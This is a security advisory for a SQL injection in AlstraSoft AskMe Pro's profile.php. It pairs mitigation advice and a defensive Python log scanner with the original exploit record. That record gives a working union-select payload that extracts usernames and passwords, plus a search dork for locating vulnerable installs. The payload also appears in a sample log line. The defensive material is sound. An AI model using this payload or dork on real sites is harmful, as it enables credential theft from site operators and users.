Vendor: AskMe Pro
By: CoBRa_21
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: AskMe Pro
2009

AlstraSoft AskMe Pro ( profile.php?id ) SQL Injection Vulnerability

A SQL injection vulnerability exists in AlstraSoft AskMe Pro: the id parameter of profile.php accepts attacker-supplied SQL commands. This can be exploited to gain access to the database and potentially disclose sensitive information.

Mitigation:

Input validation should be applied to the id parameter to prevent SQL injection attacks. Additionally, the application should connect to the database with a least-privileged account.
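The same validation rule can be run over web server access logs to find past attempts against profile.php. This is an added example, not part of the original advisory or AlstraSoft's code; the log lines are constructed, and it assumes profile ids are plain unsigned integers (adjust `ID_RE` if the application differs).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache common-log style (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2009:10:01:02 +0000] "GET /askme/profile.php?id=17 HTTP/1.1" 200 5120
198.51.100.9 - - [12/Mar/2009:10:04:40 +0000] "GET /askme/profile.php?id=-5%20union%20select%200,group_concat(username,0x3a,password),2%20from+expert HTTP/1.1" 200 9033
198.51.100.3 - - [12/Mar/2009:10:06:00 +0000] "GET /askme/index.php HTTP/1.1" 200 2210
198.51.100.7 - - [12/Mar/2009:10:07:15 +0000] "GET /askme/profile.php?id=42 HTTP/1.1" 200 4987
"""

# client address and request URI from a log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Assumption: a legitimate profile id is an unsigned integer of at most 10 digits.
ID_RE = re.compile(r"[0-9]{1,10}")


def valid_profile_id(value):
    """Allow-list check: the whole value must be ASCII digits, nothing else."""
    return ID_RE.fullmatch(value) is not None


def suspicious_requests(log_text):
    """Return (client, decoded id value) for profile.php requests whose id fails the check."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, uri = m.groups()
        parts = urlsplit(uri)
        if not parts.path.endswith("/profile.php"):
            continue
        # parse_qs URL-decodes the value, so %20 and + both become spaces
        ids = parse_qs(parts.query, keep_blank_values=True).get("id", [])
        bad = [v for v in ids if not valid_profile_id(v)]
        if bad:
            hits.append((client, bad[0]))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}: non-integer id on profile.php: {value!r}")
```

Because the check is an allow-list on the decoded value, it does not depend on recognising any particular SQL keyword or encoding.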

Exploit-DB raw data:

########################################################################################
AlstraSoft AskMe Pro ( profile.php?id ) SQL Injection Vulnerability 
########################################################################################

Author : CoBRa_21
Author Web Page : null [ I've sold my website (ipbul.org) ]
Dork : inurl:forum_answer.php?que_id
Script Page : http://www.alstrasoft.com/

########################################################################################
 
Sql Injection :

http://localhost/[path]/profile.php?id=-5 union select 0,group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from+expert

########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR & ipbul.org
########################################################################################